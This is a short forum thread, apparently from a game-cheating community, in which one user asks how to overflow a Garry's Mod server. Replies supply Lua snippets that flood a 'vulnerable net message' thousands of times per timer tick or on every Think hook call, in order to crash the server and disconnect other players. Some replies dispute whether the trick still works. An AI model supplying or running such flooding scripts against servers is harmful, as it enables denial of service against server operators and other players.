How can I overflow server and abuse it? Once I do overflow it what do I gain with it?
Just do
timer.Create("crashdashit", 2, 0, function()
for i=0, 15000 do
net.Start("Vulnerable net message")
net.SendToServer()
end
end)
If you find a vulnerable net message (easy) this will overflow all users
Originally Posted by Alexmagno7
Just do
timer.Create("crashdashit", 2, 0, function()
for i=0, 15000 do
net.Start("Vulnerable net message")
net.SendToServer()
end
end)
If you find a vulnerable net message (easy) this will overflow all users
Net Messages have been fixed for a very long time it won't buffer overflow unless you can edit the server modules and spam net.Recievers something that is not an local table
Originally Posted by suchisgood
Net Messages have been fixed for a very long time it won't buffer overflow unless you can edit the server modules and spam net.Recievers something that is not an local table
What? he can crash people using that if it was a valid net message
- - - Updated - - -
Originally Posted by Keepo123
What? he can crash people using that if it was a valid net message
You could do this to make it faster since the hook calls faster I learned,
Code:
function spam()
for i = 0, 1000 do
net shit here
end
end
hook.Add("Think", "", spam)
Hasn't responded in a few days and has been online recently assuming solved.